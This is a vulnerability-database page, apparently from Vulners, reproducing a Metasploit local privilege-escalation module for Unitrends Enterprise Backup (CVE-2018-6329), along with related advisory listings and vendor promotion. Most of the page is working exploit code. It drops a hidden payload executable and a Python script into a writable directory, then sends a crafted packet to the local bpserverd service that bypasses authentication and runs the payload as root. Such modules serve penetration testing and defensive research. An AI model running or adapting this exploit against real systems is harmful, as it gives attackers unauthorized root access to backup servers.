Vulners
Lucene search
Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Unitrends Enterprise Backup bpserverd Privilege Escalation Exploit | 28 Nov 201800:00 | – | zdt |
 | CVE-2018-6329 | 28 Nov 201802:34 | – | circl |
 | Unitrends Backup Remote Code Execution Vulnerability (CNVD-2018-07916) | 28 Mar 201800:00 | – | cnvd |
 | CVE-2018-6329 | 14 Mar 201819:00 | – | cve |
 | CVE-2018-6329 | 14 Mar 201819:00 | – | cvelist |
 | Unitrends UEB 10.0 - Root Remote Code Execution | 16 Mar 201800:00 | – | exploitdb |
 | Unitrends UEB 10.0 - Root Remote Code Execution | 16 Mar 201800:00 | – | exploitpack |
 | Unitrends Enterprise Backup bpserverd Privilege Escalation | 28 Nov 201802:14 | – | metasploit |
 | CVE-2018-6329 | 14 Mar 201819:29 | – | nvd |
 | CVE-2018-6329 | 14 Mar 201819:29 | – | osv |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info, {
'Name' => 'Unitrends Enterprise Backup bpserverd Privilege Escalation',
'Description' => %q{
It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the
localhost by dropping a python script on the local file system. Unitrends stopped
bpserverd from listening remotely on version 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave', # @iotennui
'h00die' # msf adaptations
],
'DisclosureDate' => 'Mar 14 2018',
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'],
['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
['EDB', '44297'],
['CVE', '2018-6329']
],
'Targets' =>
[
[ 'UEB <= 10.0', { } ]
],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0
}
))
register_advanced_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]),
OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743])
])
end
def exploit
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
#register_file_for_cleanup(exe_path)
pe_script = %Q{
import socket
import binascii
import struct
import time
import sys
RHOST = '127.0.0.1'
XINETDPORT = #{datastore['BPSERVERDPORT']}
cmd = "#{exe_path}"
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
try:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((RHOST,XINETDPORT))
except:
print "[!] Failed to connect!"
exit()
data = s1.recv(4096)
bpd_port = int(data[-8:-3])
try:
pass
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((RHOST, bpd_port))
except:
print "[!] Failed to connect!"
s1.close()
exit()
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)
cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)
#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72
packet = '\\xa5\\x52\\x00\\x2d'
packet += '\\x00' * 3
packet += packet_len
packet += '\\x00' * 3
packet += '\\x01'
packet += '\\x00' * 3
packet += '\\x4c'
packet += '\\x00' * 3
packet += cmd_len
packet += cmd
packet += '\\x00' * 3
s1.send(packet)
data = recv_timeout(s2)
print data
s1.close()
}
pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
print_status("Writing privesc script to '#{pes_path}'")
write_file(pes_path, pe_script)
#register_file_for_cleanup(pes_path)
print_status("Fixing permissions")
cmd_exec("chmod +x #{exe_path} #{pes_path}")
vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'")
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Nov 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 39.8
CVSS 210
EPSS0.78992